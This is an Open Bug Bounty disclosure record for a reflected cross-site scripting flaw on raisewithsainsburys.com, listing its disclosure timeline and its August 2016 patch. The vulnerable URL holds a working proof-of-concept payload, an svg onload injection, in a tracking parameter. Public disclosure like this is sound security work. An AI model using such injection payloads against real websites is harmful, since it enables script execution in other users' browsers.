raisewithsainsburys.com XSS vulnerability

2016-02-27T16:14:00
ID OBB:138146
Type openbugbounty
Reporter WeAreXSS
Modified 2016-08-13T00:09:00

Description

Vulnerable URL:
https://www.raisewithsainsburys.com/?cid=132555&utm;_source=userEmail&utm;_medium=Email&utm;_campaign=6307675_151022%20-%20RWS%20Acquisition%20%28GAYL%20Non-shoppers%29&utm;_content=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E&dm;_i=21ZB,3R717,IUR81C,DISL4,1
Details:

Description| Value
---|---
Patched:| Yes, at 12.08.2016
Latest check for patch:| 12.08.2016 06:51 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 2876670
Google Pagerank| 0
VIP website status:| No
Check raisewithsainsburys.com SSL connection:| (Grade: C)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 27 February, 2016 16:14 GMT
Generic security notifications sent to website owner| 27 February, 2016 16:16 GMT
Notification sent to subscribers (without technical details)| 27 February, 2016 18:17 GMT
Vulnerability details disclosed by researcher| 21 May, 2016 17:11 GMT
Vulnerability patched by the website owner| 13 August, 2016 00:09 GMT